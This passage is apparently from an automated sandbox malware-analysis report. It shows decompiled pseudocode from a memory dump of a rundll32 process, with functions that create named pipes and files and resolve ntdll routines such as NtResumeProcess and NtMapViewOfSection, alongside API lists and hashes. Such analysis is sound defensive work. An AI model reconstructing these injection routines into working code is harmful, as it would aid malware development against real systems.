                				void* _t141;
                				intOrPtr* _t142;
                				intOrPtr* _t146;
                				void* _t148;
                				void* _t149;
                				long long _t151;
                				void* _t152;
                				void* _t168;
                
                				_t88 = __ecx;
                				_t103 = _t151;
                				 *((long long*)(_t103 + 8)) = __rcx;
                				_t149 = _t103 - 0x57;
                				_t152 = _t151 - 0x100;
                				 *((long long*)(_t149 - 0x11)) = 0xfffffffe;
                				 *((long long*)(_t103 + 0x10)) = __rbx;
                				 *((long long*)(_t103 + 0x18)) = __rsi;
                				_t142 = __r9;
                				_t112 = __r8;
                				_t146 = __rcx;
                				 *((long long*)(_t149 + 0x77)) = __rcx;
                				E00000215215205BD260(_t86, __r8, __rcx, _t149, __rdx, _t168);
                				 *((long long*)(_t149 + 0x77)) = _t146 + 0x60;
                				E00000215215205BD260(_t86, _t112, _t146 + 0x60, _t149, _t112, _t141);
                				if ( *((long long*)(__r9 + 0x18)) - 0x10 < 0) goto 0x205ba27c;
                				goto 0x205ba27f;
                				 *((long long*)(_t152 + 0x38)) = _t112;
                				 *((intOrPtr*)(_t152 + 0x30)) = 0;
                				 *((intOrPtr*)(_t152 + 0x28)) = 0x2000;
                				 *((intOrPtr*)(_t152 + 0x20)) = 0x2000;
                				_t14 = _t112 + 1; // 0x1
                				r9d = _t14;
                				r8d = 0;
                				CreateNamedPipeA(??, ??, ??, ??, ??, ??, ??, ??);
                				 *((long long*)(_t149 + 0x77)) = _t103;
                				if (_t103 != 0xffffffff) goto 0x205ba329;
                				E00000215215205893D0(_t112, _t149 - 9, "create_named_pipe(", _t146, _t149, __r9, _t112);
                				E0000021521520589550(_t149 + 0x17, _t103, __r9, _t149, ") failed");
                				_t113 = _t103;
                				E00000215215205B86E0(_t103, _t113, _t152 + 0x40);
                				asm("movups xmm0, [eax]");
                				asm("movaps [ebp-0x61], xmm0");
                				E00000215215205B7F10(_t88, 0x40000001, _t113, _t149 - 0x41, _t149 - 0x61, _t149, _t113, _t112);
                				 *((long long*)(_t149 - 0x41)) = 0x2063fb98;
                				 *((long long*)(_t149 - 0x41)) = 0x2063fa28;
                				E00000215215205F9940(_t113, _t149 - 0x41, 0x2066bb58, _t146, _t148);
                				 *((long long*)(_t152 + 0x40)) = 0x2063fa28;
                				 *((long long*)(_t149 - 0x79)) = 0x2063fa28;
                				 *((long long*)(_t149 - 0x71)) = _t113;
                				 *((long long*)(_t152 + 0x20)) = _t152 + 0x40;
                				_t75 = E00000215215205B97C0(0x40000001, _t152 + 0x40, _t113,  *_t146, _t149 - 0x61, _t142, _t146, _t146 + 8, _t149 + 0x77);
                				_t107 =  *((intOrPtr*)(_t149 - 0x71));
                				if ((_t75 & 0x00000001) == 0) goto 0x205ba38f;
                				if (_t107 != 1) goto 0x205ba36f;
                				if ((_t75 & 0xffffff00 |  *((intOrPtr*)(_t152 + 0x40)) != 0x00000000) == 0) goto 0x205ba38f;
                				E0000021521520590B90(_t88, _t113, _t149 - 0x41, _t152 + 0x40, "assign");
                				E000002152152059DF30(_t75 & 0xffffff00 |  *((intOrPtr*)(_t152 + 0x40)) != 0x00000000, _t113, _t149 - 0x41, _t146, "assign");
                				if ( *((long long*)(_t142 + 0x18)) - 0x10 < 0) goto 0x205ba399;
                				 *((long long*)(_t152 + 0x30)) = _t113;
                				 *((intOrPtr*)(_t152 + 0x28)) = 0x40000000;
                				 *((intOrPtr*)(_t152 + 0x20)) = 3;
                				r9d = 0;
                				r8d = 0;
                				CreateFileA(??, ??, ??, ??, ??, ??, ??);
                				 *((long long*)(_t149 + 0x77)) = _t107;
                				if (_t107 != 0xffffffff) goto 0x205ba3d9;
                				E00000215215205B87E0(_t88, 0x40000000, _t107, "create_file() failed", _t146, _t149);
                				asm("int3");
                				 *((long long*)(_t152 + 0x40)) = _t107;
                				 *((long long*)(_t149 - 0x79)) = _t107;
                				 *((long long*)(_t149 - 0x71)) = _t113;
                				 *((long long*)(_t152 + 0x20)) = _t152 + 0x40;
                				_t82 = E00000215215205B97C0(0x40000000, _t152 + 0x40, _t113,  *((intOrPtr*)(_t146 + 0x60)), _t149 - 0x61,  *_t142, _t146, _t146 + 0x68, _t149 + 0x77);
                				if ((_t82 & 0x00000001) == 0) goto 0x205ba43f;
                				if ( *((intOrPtr*)(_t149 - 0x71)) != 1) goto 0x205ba41f;
                				if ((_t82 & 0xffffff00 |  *((intOrPtr*)(_t152 + 0x40)) != 0x00000000) == 0) goto 0x205ba43f;
                				E0000021521520590B90(_t88, _t113, _t149 - 0x41, _t152 + 0x40, "assign");
                				return E000002152152059DF30(_t82 & 0xffffff00 |  *((intOrPtr*)(_t152 + 0x40)) != 0x00000000, _t113, _t149 - 0x41, _t146, "assign");
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Create$ExceptionFileNamedPipeThrow
                • String ID: ) failed$assign$create_file() failed$create_named_pipe(
                • API String ID: 1863101382-2295884902
                • Opcode ID: 31473f7c7322ed7117c6be139aaa34e4687a2000083736df59db62a97b9846f2
                • Instruction ID: 44051473ac39ada203cafba33264b63a390481abd0765df09771047232db87c5
                • Opcode Fuzzy Hash: 31473f7c7322ed7117c6be139aaa34e4687a2000083736df59db62a97b9846f2
                • Instruction Fuzzy Hash: 0C616732306F50DAEB109F64E4482DD33B0FBA6798F600666AE5C53AADDF38D54AC740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E0000021521520591610() {
                				void* _t71;
                				intOrPtr _t77;
                				long long _t83;
                				intOrPtr _t84;
                				long long _t87;
                				intOrPtr _t91;
                				intOrPtr* _t98;
                				long long _t107;
                				intOrPtr* _t108;
                				long long _t110;
                				long long _t111;
                				void* _t113;
                				void* _t114;
                				void* _t116;
                				long long _t119;
                				long long _t121;
                				long long _t122;
                
                				_t71 = _t116;
                				_t114 = _t71 - 0x5f;
                				 *((long long*)(_t114 + 7)) = 0xfffffffe;
                				 *((long long*)(_t71 + 8)) = _t83;
                				 *((long long*)(_t71 + 0x10)) = _t110;
                				 *((long long*)(_t71 + 0x18)) = _t107;
                				 *((long long*)(_t71 + 0x20)) = _t121;
                				_t122 = _t119;
                				_t108 = _t98;
                				_t111 = _t87;
                				if ( *((intOrPtr*)(_t87 + 0x28)) ==  *((intOrPtr*)(_t119 + 0x18))) goto 0x205916b0;
                				 *((long long*)(_t114 - 0x29)) = 0x206278d0;
                				 *((long long*)(_t114 - 0x21)) = 0x206278d0;
                				 *((long long*)(_t114 - 0x19)) = 0x206278d0;
                				 *((long long*)(_t114 - 0x39)) = "Invalid service owner.";
                				 *((char*)(_t114 - 0x31)) = 1;
                				E00000215215205F7764(_t83, _t114 - 0x39, _t114 - 0x21, _t108, _t111);
                				 *((long long*)(_t114 - 0x29)) = 0x20627910;
                				 *((long long*)(_t114 - 0x29)) = 0x2063c6d8;
                				E00000215215205A0060(_t83, _t114 + 0xf, _t114 - 0x29);
                				E00000215215205F9940(_t83, _t114 + 0xf, 0x2066b790, _t111, _t113);
                				 *((long long*)(_t114 - 0x29)) = _t111;
                				EnterCriticalSection(??);
                				 *((char*)(_t114 - 0x21)) = 1;
                				_t84 =  *((intOrPtr*)(_t111 + 0x30));
                				if (_t84 == 0) goto 0x20591788;
                				_t77 =  *((intOrPtr*)(_t84 + 0x10));
                				if (_t77 == 0) goto 0x205916eb;
                				_t91 =  *((intOrPtr*)(_t108 + 8));
                				if (_t91 == 0) goto 0x205916eb;
                				if (_t77 != _t91) goto 0x205916eb;
                				goto 0x20591713;
                				if ( *((intOrPtr*)(_t84 + 8)) == 0) goto 0x20591711;
                				if ( *_t108 == 0) goto 0x20591711;
                				if (E00000215215205F781C( *((intOrPtr*)(_t84 + 8)) + 8,  *_t108 + 8) != 0) goto 0x20591711;
                				goto 0x20591713;
                				if (0 != 0) goto 0x20591722;
                				if ( *((intOrPtr*)(_t84 + 0x20)) != 0) goto 0x205916d0;
                				goto 0x20591788;
                				 *((long long*)(_t114 - 0x11)) = 0x206278d0;
                				 *((long long*)(_t114 - 9)) = 0x206278d0;
                				 *((long long*)(_t114 - 1)) = 0x206278d0;
                				 *((long long*)(_t114 - 0x39)) = "Service already exists.";
                				 *((char*)(_t114 - 0x31)) = 1;
                				E00000215215205F7764( *((intOrPtr*)(_t84 + 0x20)), _t114 - 0x39, _t114 - 9, _t108, _t111);
                				 *((long long*)(_t114 - 0x11)) = 0x20627910;
                				 *((long long*)(_t114 - 0x11)) = 0x2063c128;
                				E000002152152059FEF0( *((intOrPtr*)(_t84 + 0x20)), _t114 + 0xf, _t114 - 0x11);
                				E00000215215205F9940( *((intOrPtr*)(_t84 + 0x20)), _t114 + 0xf, 0x2066b848, _t111);
                				asm("movups xmm0, [edi]");
                				asm("inc ecx");
                				 *((long long*)(_t122 + 0x20)) =  *((intOrPtr*)(_t111 + 0x30));
                				 *((long long*)(_t111 + 0x30)) = _t122;
                				return LeaveCriticalSection(??);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception__std_exception_copy$Throw$CriticalEnterFileHeaderRaiseSection
                • String ID: Invalid service owner.$Service already exists.
                • API String ID: 827508800-4115445021
                • Opcode ID: fb3683fc151cd7cdfbb042e89559c00cc1587cf7cb1217f112951179ae886385
                • Instruction ID: e8d9458c466d608065093a34c963c9932a22f228e03d7a7ab85060fc72436fc7
                • Opcode Fuzzy Hash: fb3683fc151cd7cdfbb042e89559c00cc1587cf7cb1217f112951179ae886385
                • Instruction Fuzzy Hash: 56512433702F64D9EB10CBA0E8882D833A9FBA8788F5545A6DE4D53B98EF34C555C394
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E00000215215205BC290(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				long long _v32;
                				long long _v40;
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t30;
                				void* _t33;
                				void* _t44;
                				void* _t46;
                				intOrPtr _t55;
                				intOrPtr _t56;
                				intOrPtr _t57;
                				intOrPtr* _t66;
                				intOrPtr _t72;
                				intOrPtr _t81;
                				signed long long _t82;
                				long long _t83;
                				void* _t84;
                
                				_t55 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t84 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t83 =  *0x20683530; // 0x0
                				_a24 = _t83;
                				_t81 =  *0x20681950; // 0x0
                				if (_t81 != 0) goto 0x205bc30c;
                				E00000215215205D19DC(0,  &_a8);
                				_t46 =  *0x20681950 - _t81; // 0x0
                				if (_t46 != 0) goto 0x205bc2fb;
                				_t30 =  *0x20681908; // 0x0
                				 *0x20681908 = _t30 + 1;
                				 *0x20681950 = _t55;
                				_t33 = E00000215215205D1A5C(_t55,  &_a8);
                				_t82 =  *0x20681950; // 0x0
                				_t72 = _a8;
                				if (_t82 -  *((intOrPtr*)(_t72 + 0x18)) >= 0) goto 0x205bc329;
                				_t56 =  *((intOrPtr*)(_t72 + 0x10));
                				if ( *((intOrPtr*)(_t56 + _t82 * 8)) != 0) goto 0x205bc3c6;
                				goto 0x205bc32b;
                				if ( *((char*)(_t72 + 0x24)) == 0) goto 0x205bc344;
                				E00000215215205D6CC0(_t33);
                				if (_t82 -  *((intOrPtr*)(_t56 + 0x18)) >= 0) goto 0x205bc349;
                				_t57 =  *((intOrPtr*)(_t56 + 0x10));
                				if ( *((intOrPtr*)(_t57 + _t82 * 8)) != 0) goto 0x205bc3c6;
                				if (_t83 == 0) goto 0x205bc353;
                				goto 0x205bc3c6;
                				E00000215215205B7890(0, _t44, _t83,  &_a24, _t84, _t83);
                				if (_t57 != 0xffffffff) goto 0x205bc3a8;
                				_v48 = 0x206278d0;
                				_v40 = 0x206278d0;
                				_v32 = 0x206278d0;
                				_v40 = "bad cast";
                				_v48 = 0x20628048;
                				E00000215215205F9940(_t83,  &_v48, 0x2066bb90, _t83);
                				asm("int3");
                				_t66 = _a24;
                				 *0x20683530 = _t66;
                				 *((intOrPtr*)( *_t66 + 8))();
                				return E00000215215205D1A5C(E00000215215205D6C88(0x20628048, _t66),  &_a16);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID: bad cast
                • API String ID: 1824299764-3145022300
                • Opcode ID: 9d26909156540afe185f4668f8e219048678aadbe9bf4adc24b25214e70df52f
                • Instruction ID: c7109b040a31b44ac178b61ad00e574eb1504c6f7f96b9086c831cd64e036121
                • Opcode Fuzzy Hash: 9d26909156540afe185f4668f8e219048678aadbe9bf4adc24b25214e70df52f
                • Instruction Fuzzy Hash: 0841BF33303F60C1EA209B15E4582D967A4FBE57A0F6842A2EE9D077ACDB38E446C304
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 40%
                			E0000021521520587CB0(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, signed char** __r9, long long _a8, long long _a16, long long _a24) {
                				void* _v8;
                				signed int _v272;
                				intOrPtr _v292;
                				long long _v304;
                				char _v312;
                				void* __rdi;
                				signed int _t21;
                				void* _t30;
                				void* _t33;
                				void* _t34;
                				signed char** _t43;
                				void* _t64;
                
                				_a8 = __rbx;
                				_a16 = __rbp;
                				_a24 = __rsi;
                				_t64 = __rcx;
                				r8d = 0x128;
                				_t43 = __r9;
                				E00000215215205F8EF0(_t30, 0, _t33, _t34,  &_v312, __rdx, __r8, __r8);
                				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0x20587cf1;
                				goto 0x20587cf4;
                				_v304 = __r8;
                				_v292 =  *((intOrPtr*)(__r8 + 0x10));
                				if (_t43[2] == 0) goto 0x20587d31;
                				if (_t43[3] - 0x10 < 0) goto 0x20587d11;
                				asm("o16 nop [eax+eax]");
                				_t21 =  *( *_t43) & 0x000000ff;
                				_v272 = _t21;
                				if (_t21 != 0) goto 0x20587d20;
                				GetModuleHandleW(??);
                				GetProcAddress(??, ??);
                				GetProcAddress(??, ??);
                				 *((long long*)(__r8))();
                				 *((long long*)(__r8))();
                				if (_t64 == 0) goto 0x20587d8b;
                				E00000215215205C9E18(__r8,  &_v312, "NtResumeProcess", __rdx, _t64);
                				CloseHandle(??);
                				return 1;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleProc$CloseModule
                • String ID: NtResumeProcess$RtlNtStatusToDosError$ntdll.dll
                • API String ID: 133214361-1717905385
                • Opcode ID: 6030877f1eb43a60b0b866ad09762e0b622c24f5cde4c8e934917fe96ebc2ba6
                • Instruction ID: ecf62530fcb7da97a6a97c6a928a41e5d682f5f734f3678f0274906634f7278e
                • Opcode Fuzzy Hash: 6030877f1eb43a60b0b866ad09762e0b622c24f5cde4c8e934917fe96ebc2ba6
                • Instruction Fuzzy Hash: 09217A33306FA4C6EB14DB21E4487E96360EBA9FC0F5840A1DE5A47B99DF39C696C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 50%
                			E00000215215205CAA5C(long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, char _a32) {
                				void* _v24;
                				char _v40;
                				intOrPtr _v48;
                				signed int _v56;
                				intOrPtr _v64;
                				long long _v72;
                				long long _v80;
                				signed long long _v88;
                				struct HINSTANCE__* _t45;
                				struct HINSTANCE__* _t48;
                				void* _t54;
                				void* _t59;
                				WCHAR* _t61;
                
                				_t59 = _t54;
                				 *((long long*)(_t59 + 8)) = __rbx;
                				 *((long long*)(_t59 + 0x10)) = __rbp;
                				 *(_t59 - 0x28) =  *(_t59 - 0x28) & 0x00000000;
                				 *(_t59 + 0x20) =  *(_t59 + 0x20) & 0x00000000;
                				 *((intOrPtr*)(_t59 + 0x24)) = 0;
                				GetModuleHandleW(_t61);
                				GetProcAddress(_t45);
                				GetProcAddress(_t48);
                				_v48 = 0x40;
                				r9d = 0;
                				_v56 = _v56 & 0x00000000;
                				_v64 = 2;
                				_v72 =  &_v40;
                				_v80 =  &_a32;
                				_v88 = _v88 & 0x00000000;
                				 *__rax();
                				return  *__rax();
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: @$NtMapViewOfSection$RtlNtStatusToDosError$ntdll.dll
                • API String ID: 667068680-1608534789
                • Opcode ID: fc45787890a71328f2095b7604e39bab7b7ac5c3e977fde0e36e41eb77b27573
                • Instruction ID: efc59f2cc50db9beaffa59b80b295d06a182ae1956dc92bcbd1c4b7d674fef08
                • Opcode Fuzzy Hash: fc45787890a71328f2095b7604e39bab7b7ac5c3e977fde0e36e41eb77b27573
                • Instruction Fuzzy Hash: AF115872201B50CAE7609F22F848B9977A4FB98BE4F654135DE4D43758DF79C589CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E0000021521520608064(void* __edx, void* __eflags, long long __rbx, char* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, intOrPtr _a48) {
                				void* _v40;
                				char _v48;
                				signed long long _v64;
                				intOrPtr _v72;
                				signed int _v96;
                				signed int _v104;
                				void* _t23;
                				void* _t32;
                				void* _t52;
                				signed long long _t53;
                				void* _t56;
                				int _t66;
                				void* _t75;
                				int _t83;
                				char* _t85;
                				int _t88;
                				void* _t89;
                				int _t91;
                
                				_t52 = _t75;
                				 *((long long*)(_t52 + 8)) = __rbx;
                				 *((long long*)(_t52 + 0x10)) = __rbp;
                				 *((long long*)(_t52 + 0x18)) = __rsi;
                				_t89 = __rdx;
                				_t56 = __r8;
                				E00000215215205FA5D4(_t52, __r8, _t52 - 0x48, _a48);
                				_t53 = _v64;
                				r12d =  *((intOrPtr*)(_t53 + 0x18));
                				if (__rcx == 0) goto 0x206080c1;
                				if (_t89 == 0) goto 0x206080c1;
                				 *__rcx = 0;
                				if (__r8 == 0) goto 0x206080c1;
                				if (__r9 != 0) goto 0x206080d3;
                				_t23 = E0000021521520603944(_t53);
                				 *_t53 = 0x16;
                				E00000215215205FAABC(_t23);
                				goto 0x20608104;
                				_v96 = _v96 & 0x00000000;
                				r9d = r9d | 0xffffffff;
                				_v104 = _v104 & 0x00000000;
                				if (MultiByteToWideChar(_t91, _t88, _t85) != 0) goto 0x20608108;
                				E00000215215206038D4(GetLastError(), _t53, __r8);
                				goto 0x20608151;
                				E0000021521520603D7C(_t53, _t25 + _t25);
                				if (_t53 == 0) goto 0x20608147;
                				_v96 = 0;
                				r9d = r9d | 0xffffffff;
                				_v104 = _t53;
                				if (MultiByteToWideChar(_t83, _t66, ??, ??) != 0) goto 0x20608185;
                				E00000215215206038D4(GetLastError(), _t53, _t56);
                				_t32 = E000002152152060A780(_t53, _t53);
                				if (_v48 == 0) goto 0x20608164;
                				 *(_v72 + 0x3a8) =  *(_v72 + 0x3a8) & 0xfffffffd;
                				return _t32;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharErrorLastMultiWide$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 351348912-0
                • Opcode ID: 1b7341a35a17c1a4410c1fa4f711147b759dae2ad749b8b3b14199354af20588
                • Instruction ID: 4489bc5de262e6b362a288c53a308a808aa6cfd971ebd72eb17892d2ce278120
                • Opcode Fuzzy Hash: 1b7341a35a17c1a4410c1fa4f711147b759dae2ad749b8b3b14199354af20588
                • Instruction Fuzzy Hash: 0E41B633346F60C5EA74DB26A80C7DB6696BFE4BD4F2842A49E89077D9DF38D4458700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D1F7C(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t42;
                				intOrPtr _t50;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t55;
                				signed long long _t56;
                				intOrPtr _t63;
                				intOrPtr* _t77;
                				long long _t78;
                				void* _t79;
                
                				_t50 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t79 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t78 =  *0x206818e8; // 0x0
                				_a24 = _t78;
                				_t55 =  *0x20683598; // 0x0
                				if (_t55 != 0) goto 0x205d1ff7;
                				E00000215215205D19DC(0,  &_a8);
                				_t42 =  *0x20683598 - _t55; // 0x0
                				if (_t42 != 0) goto 0x205d1fe6;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20683598 = _t50;
                				_t29 = E00000215215205D1A5C(_t50,  &_a8);
                				_t56 =  *0x20683598; // 0x0
                				_t63 = _a8;
                				if (_t56 -  *((intOrPtr*)(_t63 + 0x18)) >= 0) goto 0x205d200b;
                				_t51 =  *((intOrPtr*)(_t63 + 0x10));
                				goto 0x205d200d;
                				if ( *((intOrPtr*)(_t51 + _t56 * 8)) != 0) goto 0x205d209a;
                				if ( *((intOrPtr*)(_t63 + 0x24)) == dil) goto 0x205d2033;
                				E00000215215205D6CC0(_t29);
                				if (_t56 -  *((intOrPtr*)(_t51 + 0x18)) >= 0) goto 0x205d2031;
                				_t52 =  *((intOrPtr*)(_t51 + 0x10));
                				goto 0x205d2033;
                				if ( *((intOrPtr*)(_t52 + _t56 * 8)) != 0) goto 0x205d209a;
                				if (_t78 == 0) goto 0x205d2042;
                				goto 0x205d209a;
                				E00000215215205D29AC(0, 0, _t56,  &_a24, _t79, _t78, _t79);
                				if (_t52 != 0xffffffff) goto 0x205d2071;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t56,  &_v48, 0x2066bb90, _t78);
                				asm("int3");
                				_t77 = _a24;
                				 *0x206818e8 = _t77;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t77 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t52, _t77),  &_a16);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 0344d0fdbe09caf33f4fb4071f3559366755687187d51fe158e8f5e4b3e98a31
                • Instruction ID: 7fc703aaad432106fd58d205a31b9a7dd21fc9df49ecdb288d892bd833193c97
                • Opcode Fuzzy Hash: 0344d0fdbe09caf33f4fb4071f3559366755687187d51fe158e8f5e4b3e98a31
                • Instruction Fuzzy Hash: 7B314C33306E20D1EA219B25E59C2D96361EBF47E0F680292AE5D076EDDE34D483C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205DA05C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681bc0; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b10; // 0x0
                				if (_t56 != 0) goto 0x205da0d7;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b10 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205da0c6;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b10 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b10; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205da0eb;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205da0ed;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205da17a;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205da113;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205da111;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205da113;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205da17a;
                				if (_t79 == 0) goto 0x205da122;
                				goto 0x205da17a;
                				E00000215215205DC9E4(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205da151;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681bc0 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: cd121cf2d571eea744ee26f31ff072a59a2cbaf16eaf3f45634907714eb43b4e
                • Instruction ID: 72a94bb9b22069f78df4bd1ab3b2b4fc76caa3d45a333973e3a408e28f8e71c1
                • Opcode Fuzzy Hash: cd121cf2d571eea744ee26f31ff072a59a2cbaf16eaf3f45634907714eb43b4e
                • Instruction Fuzzy Hash: 42315A37306E20C1EA219B25E9582EA6365EBE4BE0F184292EE6D077EDDF34D447C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 62%
                			E00000215215205D20B4(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t37;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x206818f0; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x206835c0; // 0x0
                				if (_t56 != 0) goto 0x205d212f;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x206835c0 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d211e;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x206835c0 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x206835c0; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d2143;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d2145;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d21d2;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d216b;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d2169;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d216b;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d21d2;
                				if (_t79 == 0) goto 0x205d217a;
                				goto 0x205d21d2;
                				E00000215215205D2A70(_t37, 0, 0, _t57,  &_a24, _t80);
